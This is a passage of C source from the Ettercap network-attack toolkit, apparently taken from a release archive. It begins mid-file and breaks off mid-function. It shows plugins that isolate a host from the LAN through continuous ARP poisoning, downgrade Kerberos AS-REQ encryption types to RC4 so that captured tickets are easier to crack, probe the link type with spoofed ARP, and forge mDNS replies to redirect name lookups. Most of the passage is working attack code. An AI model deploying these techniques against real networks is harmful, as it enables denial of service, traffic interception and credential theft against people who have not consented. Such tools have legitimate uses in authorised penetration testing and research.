hosts_list) victims; /* protos */ int plugin_load(void *); static int isolate_init(void *); static int isolate_fini(void *); static void parse_arp(struct packet_object *po); static int add_to_victims(struct packet_object *po); EC_THREAD_FUNC(isolate); /* plugin operations */ struct plugin_ops isolate_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "isolate", /* a short description of the plugin (max 50 chars) */ .info = "Isolate an host from the lan", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &isolate_init, /* deactivation function */ .fini = &isolate_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &isolate_ops); } /******************* STANDARD FUNCTIONS *******************/ static int isolate_init(void *dummy) { struct ip_list *t; /* variable not used */ (void) dummy; /* sanity check */ if (LIST_EMPTY(&EC_GBL_TARGET1->ips) && LIST_EMPTY(&EC_GBL_TARGET1->ip6)) { INSTANT_USER_MSG("isolate: please specify the TARGET host\n"); return PLUGIN_FINISHED; } /* * we'll use arp request to detect the hosts the victim * is trying to contact. */ hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); /* spawn a thread to force arp of already cached hosts */ LIST_FOREACH(t, &EC_GBL_TARGET1->ips, next) { ec_thread_new("isolate", "Isolate thread", &isolate, t); } return PLUGIN_RUNNING; } static int isolate_fini(void *dummy) { pthread_t pid; struct hosts_list *h, *tmp; /* variable not used */ (void) dummy; /* remove the hook */ hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); /* get those pids and kill 'em all */ while(!pthread_equal(pid = ec_thread_getpid("isolate"), ec_thread_getpid(NULL))) ec_thread_destroy(pid); /* free the list */ LIST_FOREACH_SAFE(h, &victims, next, tmp) { SAFE_FREE(h); LIST_REMOVE(h, next); } return PLUGIN_FINISHED; } /*********************************************************/ /* Parse the arp packets */ static void parse_arp(struct packet_object *po) { char tmp[MAX_ASCII_ADDR_LEN]; struct ip_list *t, *h; /* * this is the mac address used to isolate the host. * usually is the same as the victim, but can be an * non-existent one. * modify at your choice. */ u_char *isolate_mac = po->L2.src; LIST_FOREACH(h, &EC_GBL_TARGET1->ips, next) { /* process only arp requests from this host */ if (!ip_addr_cmp(&h->ip, &po->L3.src)) { int good = 0; /* is good if target 2 is any or if it is in the target 2 list */ if(EC_GBL_TARGET2->all_ip) { good = 1; } else { LIST_FOREACH(t, &EC_GBL_TARGET2->ips, next) if (!ip_addr_cmp(&t->ip, &po->L3.dst)) good = 1; } /* add to the list if good */ if (good && add_to_victims(po) == E_SUCCESS) { USER_MSG("isolate: %s added to the list\n", ip_addr_ntoa(&po->L3.dst, tmp)); /* send the fake reply */ send_arp(ARPOP_REPLY, &po->L3.dst, isolate_mac, &po->L3.src, po->L2.src); } } } } /* * add a victim to the list for the active thread. */ static int add_to_victims(struct packet_object *po) { struct hosts_list *h; /* search if it was already inserted in the list */ LIST_FOREACH(h, &victims, next) if (!ip_addr_cmp(&h->ip, &po->L3.src)) return -E_NOTHANDLED; SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &po->L3.dst, sizeof(struct ip_addr)); /* insert in the list with the mac address of the requester */ memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&victims, h, next); return E_SUCCESS; } /* * the real isolate thread */ EC_THREAD_FUNC(isolate) { struct hosts_list *h; struct ip_list *t; /* init the thread and wait for start up */ ec_thread_init(); /* get the host to be isolated */ t = args; /* never ending loop */ LOOP { CANCELLATION_POINT(); /* walk the lists and poison the victims */ LIST_FOREACH(h, &victims, next) { /* send the fake arp message */ send_arp(ARPOP_REPLY, &h->ip, h->mac, &t->ip, h->mac); ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } /* sleep between two storms */ ec_usleep(SEC2MICRO(EC_GBL_CONF->arp_poison_warm_up * 3)); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/krb5_downgrade/000775 000000 000000 00000000000 13711276346 020115 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/krb5_downgrade/krb5_downgrade.c000664 000000 000000 00000014541 13711276346 023163 0ustar00rootroot000000 000000 /* krb5_downgrade -- ettercap plugin - Downgrades Kerberos V5 security by modifying AS-REQ packets Copyright (C) Dhiru Kholia (dhiru at openwall.com) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. This file borrows boilerplate code from the smb_down plugin. */ #include #include #include #include #include /* https://cwiki.apache.org/confluence/display/DIRxASN1/Kerberos KDC-REQ ::= SEQUENCE { -- NOTE: first tag is [1], not [0] pvno [1] INTEGER (5) , msg-type [2] INTEGER (10 -- AS -- | 12 -- TGS --), padata [3] SEQUENCE OF PA-DATA OPTIONAL -- NOTE: not empty --, req-body [4] KDC-REQ-BODY } KDC-REQ-BODY ::= SEQUENCE { kdc-options [0] KDCOptions, cname [1] PrincipalName OPTIONAL -- Used only in AS-REQ --, realm [2] Realm -- Server's realm -- Also client's in AS-REQ --, sname [3] PrincipalName OPTIONAL, from [4] KerberosTime OPTIONAL, till [5] KerberosTime, rtime [6] KerberosTime OPTIONAL, nonce [7] UInt32, etype [8] SEQUENCE OF Int32 -- EncryptionType -- in preference order --, addresses [9] HostAddresses OPTIONAL, enc-authorization-data [10] EncryptedData OPTIONAL -- AuthorizationData --, additional-tickets [11] SEQUENCE OF Ticket OPTIONAL -- NOTE: not empty } AS-REQ ::= [APPLICATION 10] KDC-REQ */ /* protos */ int plugin_load(void *); static int krb5_downgrade_init(void *); static int krb5_downgrade_fini(void *); static void parse_krb5(struct packet_object *po); /* plugin operations */ struct plugin_ops krb5_downgrade_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "krb5_downgrade", /* a short description of the plugin */ .info = "Downgrades Kerberos V5 security by modifying AS-REQ packets", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &krb5_downgrade_init, /* deactivation function */ .fini = &krb5_downgrade_fini, }; int plugin_load(void *handle) { return plugin_register(handle, &krb5_downgrade_ops); } static int krb5_downgrade_init(void *dummy) { /* variable not used */ (void)dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("krb5_downgrade: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } USER_MSG("krb5_downgrade: plugin running...\n"); hook_add(HOOK_PROTO_KRB5, &parse_krb5); return PLUGIN_RUNNING; } static int krb5_downgrade_fini(void *dummy) { /* variable not used */ (void)dummy; USER_MSG("krb5_downgrade: plugin terminated...\n"); hook_del(HOOK_PROTO_KRB5, &parse_krb5); return PLUGIN_FINISHED; } /* Downgrade the "etype" values present in AS-REQ request */ static void parse_krb5(struct packet_object *po) { u_char *ptr; ptr = po->DATA.data; struct asn1_hdr hdr; size_t length = po->DATA.len; size_t size, netypes, i; uint8_t *pos, *end; int ret; int found = 0; char tmp[MAX_ASCII_ADDR_LEN]; pos = ptr; // APPLICATION 10, look for AS-REQ packets if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) { // Hack to skip over "Record Mark" pos = pos + 4; if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) { return; } } pos = hdr.payload; end = pos + hdr.length; if (end > pos + length) return; // KDC-REQ SEQUENCE if (asn1_get_next(pos, end - pos, &hdr) < 0 || hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_SEQUENCE) { return; } pos = hdr.payload; // Locate KDC-REQ-BODY (class = 2, tag = 4) while (1) { if (end <= pos) return; ret = asn1_get_next(pos, end - pos, &hdr); if (ret < 0) return; if (hdr.class == 2 && hdr.tag == 4) { found = 1; break; } pos = hdr.payload + hdr.length; } if (!found) return; // KDC-REQ-BODY SEQUENCE pos = hdr.payload; ret = asn1_get_next(pos, end - pos, &hdr); pos = hdr.payload; // Locate etype (class = 2, tag = 8) found = 0; while (1) { if (end <= pos) return; ret = asn1_get_next(pos, end - pos, &hdr); if (ret < 0) return; if (hdr.class == 2 && hdr.tag == 8) { found = 1; break; } pos = hdr.payload + hdr.length; } if (!found) return; // SEQUENCE OF Int32 -- EncryptionType -- in preference order -- pos = hdr.payload; size = pos[1]; netypes = pos[1] / 3; if (pos + size > ptr + length) return; // Sample etype records -> 02 01 12, 02 01 11, 02 01 10, 02 01 17. // Downgrade the etypes to etype 23. pos = pos + 2; // pointing to first etype record for (i = 0; i < netypes; i++) { pos[2] = '\x17'; pos = pos + 3; po->flags |= PO_MODIFIED; } if (po->flags & PO_MODIFIED) { USER_MSG("krb5_downgrade: Downgraded etypes in AS-REQ message, %s -> ", ip_addr_ntoa(&po->L3.src, tmp)); USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp)); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/link_type/000775 000000 000000 00000000000 13711276346 017216 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/link_type/link_type.c000664 000000 000000 00000013651 13711276346 021366 0ustar00rootroot000000 000000 /* link_type -- ettercap plugin -- Check the link type (hub\switch) it sends a spoofed arp request and waits for a reply Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* globals */ #define LINK_HUB 0 #define LINK_SWITCH 1 u_char linktype; struct hosts_list targets[2]; /* mutexes */ static pthread_mutex_t link_type_mutex = PTHREAD_MUTEX_INITIALIZER; /* protos */ int plugin_load(void *); static int link_type_init(void *); static EC_THREAD_FUNC(link_type_thread); static int link_type_fini(void *); static void parse_arp(struct packet_object *po); /* plugin operations */ struct plugin_ops link_type_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "link_type", /* a short description of the plugin (max 50 chars) */ .info = "Check the link type (hub/switch)", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &link_type_init, /* deactivation function */ .fini = &link_type_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &link_type_ops); } /******************* STANDARD FUNCTIONS *******************/ static int link_type_init(void *dummy) { /* variable not used */ (void) dummy; ec_thread_new("link_type", "plugin link_type", &link_type_thread, NULL); return PLUGIN_RUNNING; } static EC_THREAD_FUNC(link_type_thread) { /* variable not used */ (void) EC_THREAD_PARAM; u_char counter = 0; struct hosts_list *h; ec_thread_init(); PLUGIN_LOCK(link_type_mutex); /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("link_type: plugin doesn't work in UNOFFENSIVE mode\n"); PLUGIN_UNLOCK(link_type_mutex); plugin_kill_thread("link_type", "link_type"); return PLUGIN_FINISHED; } /* Performs some checks */ if (EC_GBL_PCAP->dlt != IL_TYPE_ETH) { INSTANT_USER_MSG("link_type: This plugin works only on ethernet networks\n\n"); PLUGIN_UNLOCK(link_type_mutex); plugin_kill_thread("link_type", "link_type"); return PLUGIN_FINISHED; } if (!EC_GBL_PCAP->promisc) { INSTANT_USER_MSG("link_type: You have to enable promisc mode to run this plugin\n\n"); PLUGIN_UNLOCK(link_type_mutex); plugin_kill_thread("link_type", "link_type"); return PLUGIN_FINISHED; } /* Take (if any) first two elements form the host list */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { memcpy(&(targets[counter].ip), &h->ip, sizeof(struct ip_addr)); memcpy(targets[counter].mac, h->mac, MEDIA_ADDR_LEN); counter++; if (counter == 2) break; } if (counter == 0) { INSTANT_USER_MSG("link_type: You have to build host list to run this plugin\n\n"); PLUGIN_UNLOCK(link_type_mutex); plugin_kill_thread("link_type", "link_type"); return PLUGIN_FINISHED; } /* * If we have only one element in the host list * use target mac address and our ip as source */ if (counter == 1) { INSTANT_USER_MSG("link_type: Only one host in the list. Check will be less reliable\n\n"); memcpy(&(targets[1].ip), &EC_GBL_IFACE->ip, sizeof(struct ip_addr)); memcpy(targets[1].mac, targets[0].mac, MEDIA_ADDR_LEN); } /* We assume switch by default */ linktype = LINK_SWITCH; INSTANT_USER_MSG("link_type: Checking link type...\n"); /* Add the hook to collect ARP replies from the victim */ hook_add(HOOK_PACKET_ARP, &parse_arp); /* Send bogus ARP request */ send_arp(ARPOP_REQUEST, &(targets[1].ip), targets[1].mac, &(targets[0].ip), targets[0].mac); /* wait for the response */ ec_usleep(SEC2MICRO(1)); /* remove the hook */ hook_del(HOOK_PACKET_ARP, &parse_arp); INSTANT_USER_MSG("link_type: You are plugged into a "); if (linktype == LINK_SWITCH) INSTANT_USER_MSG("SWITCH\n\n"); else INSTANT_USER_MSG("HUB\n\n"); PLUGIN_UNLOCK(link_type_mutex); plugin_kill_thread("link_type", "link_type"); return PLUGIN_FINISHED; } static int link_type_fini(void *dummy) { /* variable not used */ (void) dummy; pthread_t pid; pid = ec_thread_getpid("link_type"); if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("link_type: plugin terminated...\n"); return PLUGIN_FINISHED; } /*********************************************************/ /* Check if it's the reply to our bougs request */ static void parse_arp(struct packet_object *po) { if (!memcmp(po->L2.dst, targets[1].mac, MEDIA_ADDR_LEN)) linktype = LINK_HUB; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/mdns_spoof/000775 000000 000000 00000000000 13711276346 017367 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/mdns_spoof/mdns_spoof.c000664 000000 000000 00000067473 13711276346 021723 0ustar00rootroot000000 000000 /* mdns_spoof -- ettercap plugin -- spoofs mdns replies Copyright (C) Ettercap Development Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include #include #ifndef ns_t_wins #define ns_t_wins 0xFF01 /* WINS name lookup */ #endif #define MDNS_QU_FLAG 0x8000 struct mdns_header { uint16_t id; uint16_t flags; uint16_t questions; uint16_t answer_rrs; uint16_t auth_rrs; uint16_t additional_rrs; }; struct mdns_spoof_entry { int type; /* ns_t_a, ns_t_ptr, ns_t_srv */ char *name; struct ip_addr ip; u_int16 port; /* for SRV records */ SLIST_ENTRY(mdns_spoof_entry) next; }; static SLIST_HEAD(, mdns_spoof_entry) mdns_spoof_head; /* protos */ int plugin_load(void *); static int mdns_spoof_init(void *); static int mdns_spoof_fini(void *); static int load_db(void); static void mdns_spoof(struct packet_object *po); static int parse_line(const char *str, int line, int *type_p, char **ip_p, u_int16 *port_p, char **name_p); static int get_spoofed_a(const char *a, struct ip_addr **ip); static int get_spoofed_aaaa(const char *a, struct ip_addr **ip); static int get_spoofed_ptr(const char *arpa, char **a, struct ip_addr **ip); static int get_spoofed_srv(const char *name, struct ip_addr **ip, u_int16 *port); static int prep_mdns_reply(struct packet_object *po, u_int16 class, struct ip_addr **sender, struct ip_addr **target, u_int8 **tmac , struct ip_addr *reply); char *type_str(int type); static void mdns_spoof_dump(void); /* plugin operations */ struct plugin_ops mdns_spoof_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "mdns_spoof", /* a short description of the plugin (max 50 chars) */ .info = "Sends spoofed mDNS replies", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &mdns_spoof_init, /* deactivation function */ .fini = &mdns_spoof_fini, }; /* this function is called on plugin load */ int plugin_load(void *handle) { /* load the database of spoofed replies (etter.dns) * return an error if we could not open the file */ if (load_db() != E_SUCCESS) return -E_INVALID; mdns_spoof_dump(); return plugin_register(handle, &mdns_spoof_ops); } static int mdns_spoof_init(void *dummy) { /* variable not used */ (void) dummy; /* * add the hook in the dissector. * this will pass only valid dns packets */ hook_add(HOOK_PROTO_MDNS, &mdns_spoof); return PLUGIN_RUNNING; } static int mdns_spoof_fini(void *dummy) { /* variable not used */ (void) dummy; /* remove the hook */ hook_del(HOOK_PROTO_MDNS, &mdns_spoof); return PLUGIN_FINISHED; } /* * load the database in the list */ static int load_db(void) { struct mdns_spoof_entry *d; FILE *f; char line[128]; char *ptr, *ip, *name; int lines = 0, type; u_int16 port = 0; /* open the file */ f = open_data("etc", ETTER_MDNS, FOPEN_READ_TEXT); if (f == NULL) { USER_MSG("mdns_spoof: Cannot open %s\n", ETTER_MDNS); return -E_INVALID; } /* load it in the list */ while (fgets(line, 128, f)) { /* count the lines */ lines++; /* trim comments */ if ( (ptr = strchr(line, '#')) ) *ptr = '\0'; /* skip empty lines */ if (!*line || *line == '\r' || *line == '\n') continue; /* strip apart the line */ if (!parse_line(line, lines, &type, &ip, &port, &name)) continue; /* create the entry */ SAFE_CALLOC(d, 1, sizeof(struct mdns_spoof_entry)); d->name = strdup(name); d->type = type; d->port = port; /* convert the ip address and fill the struct */ if (ip_addr_pton(ip, &d->ip) != E_SUCCESS) { USER_MSG("mdns_spoof: %s:%d Invalid IPv4 or IPv6 address\n", ETTER_MDNS, lines); SAFE_FREE(d); continue; } /* insert in the list */ SLIST_INSERT_HEAD(&mdns_spoof_head, d, next); } fclose(f); return E_SUCCESS; } /* * Parse line on format " ". */ static int parse_line (const char *str, int line, int *type_p, char **ip_p, u_int16 *port_p, char **name_p) { static char name[100+1]; static char ip[MAX_ASCII_ADDR_LEN]; static int port; char type[10+1]; DEBUG_MSG("mdns_spoof: %s:%d str '%s'", ETTER_MDNS, line, str); if (sscanf(str,"%100s %10s %40[^\r\n# ]", name, type, ip) != 3) { USER_MSG("mdns_spoof: %s:%d Invalid entry %s\n", ETTER_MDNS, line, str); return (0); } if (!strcasecmp(type,"PTR")) { if (strpbrk(name,"*?[]")) { USER_MSG("mdns_spoof: %s:%d Wildcards in PTR records are not allowed; %s\n", ETTER_MDNS, line, str); return (0); } *type_p = ns_t_ptr; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"A")) { *type_p = ns_t_a; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"AAAA")) { *type_p = ns_t_aaaa; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type, "SRV")) { /* * Additional format scan as SRV records have a different syntax */ static char ip_tmp[MAX_ASCII_ADDR_LEN]; if (sscanf(ip, "[%40[0-9a-fA-F:.]]:%d", ip_tmp, &port) == 2) { strncpy(ip, ip_tmp, strlen(ip_tmp)+1); } else if (sscanf(ip, "%20[0-9.]:%d", ip_tmp, &port) == 2) { strncpy(ip, ip_tmp, strlen(ip_tmp)+1); } else { USER_MSG("mdns_spoof: %s:%d Unknown syntax for SRV record; %s\n", ETTER_MDNS, line, str); return 0; } if (port > 0xffff || port <= 0) { USER_MSG("mdns_spoof: %s:%d Invalid value for port: %d\n", ETTER_MDNS, line, port); return 0; } *type_p = ns_t_srv; *name_p = name; *ip_p = ip; *port_p = port & 0x0000ffff; return 1; } USER_MSG("mdns_spoof: %s:%d Unknown record type %s\n", ETTER_MDNS, line, type); return (0); } /* * parse the request and return a spoofed response */ static void mdns_spoof(struct packet_object *po) { struct mdns_header *mdns; struct iface_env *iface; char name[NS_MAXDNAME]; int name_len; u_char *q, *data, *end;; u_int16 class; u_int16 type; int x; mdns = (struct mdns_header *)po->DATA.data; data = (u_char *)(mdns+1); end = (u_char *)mdns + po->DATA.len; q = data; if (mdns->flags == 0x8400 || mdns->answer_rrs > 0) { //We only want queries. return; } /* Do not forward query */ po->flags |= PO_DROPPED; /* set incoming interface as outgoing interface for reply */ iface = po->flags & PO_FROMIFACE ? EC_GBL_IFACE : EC_GBL_BRIDGE; /* process all the questions */ for (x = 0; x < mdns->questions; x++) { name_len = dn_expand((u_char*)mdns, end, q, name, sizeof(name)); if (name_len == -1) return; q = data + name_len; if (q >= end || name_len == 0) return; NS_GET16(type, q); NS_GET16(class, q); /* handle only internet class - unmask the QU flag */ if ((class & ~MDNS_QU_FLAG) != ns_c_in) return; if(type == ns_t_a) { struct ip_addr *reply; struct ip_addr *sender; struct ip_addr *target; u_int8 *tmac; u_int8 answer[name_len + 10 + 4]; u_char *p = answer + name_len; char tmp[MAX_ASCII_ADDR_LEN]; /* found the reply in the list */ if (get_spoofed_a(name, &reply) != E_SUCCESS) return; /* check if the family matches the record type */ if (ntohs(reply->addr_type) != AF_INET) { USER_MSG("mdns_spoof: can not spoof A record for %s " "because the value is not a IPv4 address\n", name); return; } /* * in MDNS the original question is not included * into the reply packet as with pure DNS - * fill the buffer with the questioned name of the request * we will append the answer just after the quoted name */ memcpy(answer, data, name_len); /* name */ memcpy(p , "\x00\x01", 2); /* type A */ memcpy(p + 2, "\x80\x01", 2); /* cache-flush-bit + class */ memcpy(p + 4, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ memcpy(p + 8, "\x00\x04", 2); /* datalen */ ip_addr_cpy(p + 10, reply); /* data */ /* * depending on the MDNS question, the target address has to be redefined; * we also can not use the multicast address as the source but also; * don't want to reveal our own IP, so the sender needs also be redefined; * hence the variables for the transport of the reply need to be prepared. */ prep_mdns_reply(po, class, &sender, &target, &tmac, reply); /* send the reply back to the multicast or unicast address * and set the faked address as the source address for the transport */ send_mdns_reply(iface, po->L4.src, sender, target, tmac, ntohs(mdns->id), answer, sizeof(answer), 1, 0, 0); USER_MSG("mdns_spoof: [%s %s] spoofed to [%s]\n", name, type_str(type), ip_addr_ntoa(reply, tmp)); } if(type == ns_t_aaaa) { struct ip_addr *reply; struct ip_addr *sender; struct ip_addr *target; u_int8 *tmac; u_int8 answer[name_len + 10 + 16]; u_char *p = answer + name_len; char tmp[MAX_ASCII_ADDR_LEN]; /* found the reply in the list */ if (get_spoofed_aaaa(name, &reply) != E_SUCCESS) return; /* check if the family matches the record type */ if (ntohs(reply->addr_type) != AF_INET6) { USER_MSG("mdns_spoof: can not spoof AAAA record for %s " "because the value is not a IPv6 address\n", name); return; } /* * in MDNS the original question is not included * into the reply packet as with pure DNS - * fill the buffer with the questioned name of the request * we will append the answer just after the quoted name */ memcpy(answer, data, name_len); /* name */ memcpy(p , "\x00\x1c", 2); /* type AAAA */ memcpy(p + 2, "\x80\x01", 2); /* cache-flush-bit + class */ memcpy(p + 4, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ memcpy(p + 8, "\x00\x10", 2); /* datalen */ ip_addr_cpy(p + 10, reply); /* data */ /* * depending on the MDNS question, the target address has to be redefined; * we also can not use the multicast address as the source but also; * don't want to reveal our own IP, so the sender needs also be redefined; * hence the variables for the transport of the reply need to be prepared. */ prep_mdns_reply(po, class, &sender, &target, &tmac, reply); /* send the reply back to the multicast or unicast address * and set the faked address as the source address for the transport */ send_mdns_reply(iface, po->L4.src, sender, target, tmac, ntohs(mdns->id), answer, sizeof(answer), 1, 0, 0); USER_MSG("mdns_spoof: [%s %s] spoofed to [%s]\n", name, type_str(type), ip_addr_ntoa(reply, tmp)); } else if (type == ns_t_ptr) { struct ip_addr *reply; struct ip_addr *sender; struct ip_addr *target; u_int8 *tmac; u_int8 answer[name_len + 256]; char *a, *p = (char*)answer + name_len; int rlen; /* found the reply in the list */ if (get_spoofed_ptr(name, &a, &reply) != E_SUCCESS) return; /* * in MDNS the original question is not included * into the reply packet as with pure DNS - * fill the buffer with the questioned name of the request * we will append the answer just after the quoted name */ memcpy(answer, data, name_len); /* name */ memcpy(p , "\x00\x0c", 2); /* type PTR */ memcpy(p + 2, "\x80\x01", 2); /* cache-flush-bit + class */ memcpy(p + 4, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ /* compress the string into the buffer */ rlen = dn_comp(a, (u_char*)p + 10, 256, NULL, NULL); /* put the length before the dn_comp'd string */ p += 8; NS_PUT16(rlen, p); /* * depending on the MDNS question, the target address has to be redefined; * we also can not use the multicast address as the source but also; * don't want to reveal our own IP, so the sender needs also be redefined; * hence the variables for the transport of the reply need to be prepared. */ prep_mdns_reply(po, class, &sender, &target, &tmac, reply); /* send the fake reply */ send_mdns_reply(iface, po->L4.src, sender, target, tmac, ntohs(mdns->id), answer, name_len + 10 + rlen, 1, 0, 0); USER_MSG("mdns_spoof: [%s %s] spoofed to [%s]\n", name, type_str(type), a); } else if (type == ns_t_srv) { struct ip_addr *reply; struct ip_addr *sender; struct ip_addr *target; u_int8 *tmac; u_int8 answer[name_len + 22 + 12 + 16]; char *p = (char *)answer + name_len; char tmp[MAX_ASCII_ADDR_LEN]; char srvoffset[2]; char tgtoffset[2]; u_int16 port; int dn_offset = 0; /* found the reply in the list */ if (get_spoofed_srv(name, &reply, &port) != E_SUCCESS) return; /* * to refer the target to a proper domain name, we have to strip the * service and protocol label from the questioned domain name */ dn_offset += *(data+dn_offset) + 1; /* first label (e.g. _ldap)*/ dn_offset += *(data+dn_offset) + 1; /* second label (e.g. _tcp) */ /* avoid offset overrun */ if (dn_offset + 12 > 255) { dn_offset = 0; } tgtoffset[0] = 0xc0; /* offset byte */ tgtoffset[1] = 12 + dn_offset; /* offset to the actual domain name */ /* * to inject the spoofed IP address in the additional section, * we have set the offset pointing to the spoofed domain name set * below (in turn, after the domain name [variable length] in the * question section) */ srvoffset[0] = 0xc0; /* offset byte */ srvoffset[1] = 12 + name_len + 16; /* offset to the answer */ /* * in MDNS the original question is not included * into the reply packet as with pure DNS - * fill the buffer with the questioned name of the request * we will append the answer just after the quoted name */ memcpy(answer, data, name_len); /* name */ memcpy(p , "\x00\x21", 2); /* type SRV */ memcpy(p + 2, "\x80\x01", 2); /* class IN */ memcpy(p + 4, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ memcpy(p + 8, "\x00\x0c", 2); /* data length */ memcpy(p + 10, "\x00\x00", 2); /* priority */ memcpy(p + 12, "\x00\x00", 2); /* weight */ p+=14; NS_PUT16(port, p); /* port */ p-=16; /* * add "srv." in front of the stripped domain * name and resolve it in the additional * record (here `srvoffset' is pointing at) */ memcpy(p + 16, "\x03\x73\x72\x76", 4); /* target */ memcpy(p + 20, tgtoffset,2); /* compressed name offset */ /* add the additional record for the spoofed IPv4 address*/ if (ntohs(reply->addr_type) == AF_INET) { memcpy(p + 22, srvoffset, 2); /* compressed name offset */ memcpy(p + 24, "\x00\x01", 2); /* type A */ memcpy(p + 26, "\x80\x01", 2); /* class */ memcpy(p + 28, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ memcpy(p + 32, "\x00\x04", 2); /* datalen */ ip_addr_cpy(p + 34, reply); /* data */ memset(p + 38, 0, 12); /* padding */ } /* add the additional record for the spoofed IPv6 address*/ else if (ntohs(reply->addr_type) == AF_INET6) { memcpy(p + 22, srvoffset, 2); /* compressed name offset */ memcpy(p + 24, "\x00\x1c", 2); /* type AAAA */ memcpy(p + 26, "\x80\x01", 2); /* class */ memcpy(p + 28, "\x00\x00\x0e\x10", 4); /* TTL (1 hour) */ memcpy(p + 32, "\x00\x10", 2); /* datalen */ ip_addr_cpy(p + 34, reply); /* data */ } else { /* IP address not valid - abort */ return; } /* * depending on the MDNS question, the target address has to be redefined; * we also can not use the multicast address as the source but also; * don't want to reveal our own IP, so the sender needs also be redefined; * hence the variables for the transport of the reply need to be prepared. */ prep_mdns_reply(po, class, &sender, &target, &tmac, reply); /* send the reply back to the multicast or unicast address * and set the faked address as the source address for the transport */ send_mdns_reply(iface, po->L4.src, sender, target, tmac, ntohs(mdns->id), answer, sizeof(answer), 2, 0, 0); USER_MSG("mdns_spoof: SRV [%s] spoofed to [%s:%d]\n", name, ip_addr_ntoa(reply, tmp), port); } } } /* * return the ip address for the name - IPv4 */ static int get_spoofed_a(const char *a, struct ip_addr **ip) { struct mdns_spoof_entry *d; SLIST_FOREACH(d, &mdns_spoof_head, next) { if (d->type == ns_t_a && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the ip address for the name - IPv6 */ static int get_spoofed_aaaa(const char *a, struct ip_addr **ip) { struct mdns_spoof_entry *d; SLIST_FOREACH(d, &mdns_spoof_head, next) { if (d->type == ns_t_aaaa && match_pattern(a, d->name)) { /* return the pointer to the struct */ *ip = &d->ip; return E_SUCCESS; } } return -E_NOTFOUND; } /* * return the name for the ip address */ static int get_spoofed_ptr(const char *arpa, char **a, struct ip_addr **ip) { struct mdns_spoof_entry *d; struct ip_addr ptr; unsigned int oct[32]; int len, v4len, v6len; u_char ipv4[4]; u_char ipv6[16]; char v4tld[] = "in-addr.arpa"; char v6tld[] = "ip6.arpa"; len = strlen(arpa); v4len = strlen(v4tld); v6len = 